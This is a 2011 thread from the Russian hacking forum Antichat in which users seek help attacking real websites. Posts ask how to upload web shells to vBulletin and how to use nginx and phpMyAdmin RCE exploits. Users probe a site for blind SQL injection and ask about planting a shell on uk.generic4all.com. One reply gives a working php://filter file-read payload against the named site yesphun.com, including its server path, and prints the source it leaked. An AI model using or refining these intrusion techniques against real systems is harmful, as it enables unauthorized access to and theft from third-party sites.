ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.09.2011, 00:56
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
Провел на форуме:
173402
Репутация:
37
|
|
Сообщение от ~{OmRus}~
Те что пишут:
Способ заливки шелла в vBulletin 3.5.*.
Способ заливки шелла в vBulletin 2.*.* и 3.0.*
Я пробивал и нечего не получилось... Писало Error на линии 1010
все страницы полистай там их 13
|
|
|
26.09.2011, 01:31
|
|
Новичок
Регистрация: 27.08.2011
Сообщений: 24
Провел на форуме:
8471
Репутация:
1
|
|
Сообщение от vasykas
все страницы полистай там их 13
Нечего не работает пишет что на сторочке такой то ошибка Как еще залить?
|
|
|
|
26.09.2011, 16:53
|
|
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
Провел на форуме:
60692
Репутация:
6
|
|
nginx Buffer Underflow Vulnerability
Как юзать?
|
|
|
|
26.09.2011, 20:53
|
|
Новичок
Регистрация: 27.06.2010
Сообщений: 15
Провел на форуме:
3822
Репутация:
0
|
|
Довел 1 сайт до:
Сообщение от None
Ошибка: Ошибка базы данных - Illegal mix of collations (ascii_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation '='
Суть в том, что есть некая страница page.html?...&c=
... — некоторые параметры, не в них суть.
&c= — можно указать что угодно. Если указать какой-нибудь некорректный знак выдает эту ошибку.
Что можно с этим сделать?
Также есть страницы newsN.html (где N — номер новости).
Видимо расширение сделано с помощью .htaccess, т.к. можно ввести даже news-1.html ; news9999999999.html — и страница откроется (новость пустая, но открывается же).
Можно с этим что-то сделать? |
|
|
|
26.09.2011, 21:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
news2.html true
news1+1.html true
news3'.html false
как blind можно попробовать.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
26.09.2011, 23:39
|
|
Новичок
Регистрация: 25.08.2011
Сообщений: 7
Провел на форуме:
2607
Репутация:
0
|
|
Нашел на одном сайте PMA v2.11.9 со скриптом установки setup.php. PHP стоит 5.2.10. Попробывал все доступные экспы по RCE - и через ftp и через сессии от Snipper`а, а результата нет.
При использовании экспа для ftp выводил phpinfo(); exit; конструкции. Должно было вывалится окно phpinfo, но на выводе все равно только стандартное окно установшика.
Прошу помощи у знатоков. В чем может быть причина?
|
|
|
|
27.09.2011, 13:52
|
|
Новичок
Регистрация: 27.06.2010
Сообщений: 15
Провел на форуме:
3822
Репутация:
0
|
|
Сообщение от shell_c0de
news2.html true
news1+1.html true
news3'.html false
как blind можно попробовать.
news2.html - заходит
news1+1.html - выдает первую страницу?
news3'.html - открывает третью, вроде не экранируется.
Есть возможность блинда?
|
|
|
|
27.09.2011, 20:11
|
|
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
Провел на форуме:
60692
Репутация:
6
|
|
http://yesphun[antigoogle].com/index.php?p=1
Вроде нашел инклуд. Как обрезать расширение? %00 не пашет!
|
|
|
|
28.09.2011, 11:56
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
К примеру малоизвестный способ чтения файлов:
Сообщение от None
http://www.yesphun.com/index.php?p=php://filter/convert.base64-encode/resource=/home/yesphun/domains/yesphun.com/public_html/index
PHP код:
[COLOR="#000000"]
YESPHUN.COM - Sabah's 1st Low-Cost Malaysia Web Hosting Services
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
try {
var pageTracker = _gat._getTracker("UA-12321486-1");
pageTracker._trackPageview();
} catch(err) {}
window.fbAsyncInit = function() {
FB.init({appId: 'your app id', status: true, cookie: true,
xfbml: true});
};
(function() {
var e = document.createElement('script'); e.async = true;
e.src = document.location.protocol +
'//connect.facebook.net/en_US/all.js';
document.getElementById('fb-root').appendChild(e);
}());
body{
padding:0;
margin:0;
font-family:Arial;
font-size:12px;
color:#000000;
background-color:#8c0007;
}
a:link, a:visited {
color:#000000;
text-decoration:underline;
}
a:active, a:hover {
color:#990000;
text-decoration:none;
}
img{border:0;}
YESPHUN IT CENTRE (001975944-K)
Home
Web Hosting
Domain Name
Services
Promotions
Sign up
Payment Info
FAQs
Contact Us
[COLOR="#0000BB"][/COLOR]
Manage my billing
Update Payment
Submit a ticket
View/Reply ticket
Event & News
Domain Login
Follow us on..
About us..
YESPHUN.COM is one of the malaysia low-cost hosting provider since 2008. We do provide Domain Registration, Shared Hosting Plan, Reseller Hosting Plan, and Dedicated Servers. Besides, we also provided web design, E-Commerce solutions, blog solutions, forum solutions & etc.
Our promises is to offer you an affordable hosting and high quality of services. Everyone can get a host.
Copyright © 2010 YESPHUN IT CENTRE (001975944-K). All Right Reserved.
Best view at 1280 x 800 resolution. Recommended browser Mozilla Firefox 3.6++ or Google Chrome 5.0++
Terms & Conditions | Acceptable Use Policy | FAQs | Contact Us
[/COLOR]
Так же, в целях ознакомления советую прочитать эту статью: /thread98525.html |
|
|
|
28.09.2011, 16:49
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Нашел вот это.
http://uk.generic4all.com/upload_files/product_images/product_image_173_small.png/x.php
Каким образом здесь залить шелл, или это не возможно?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
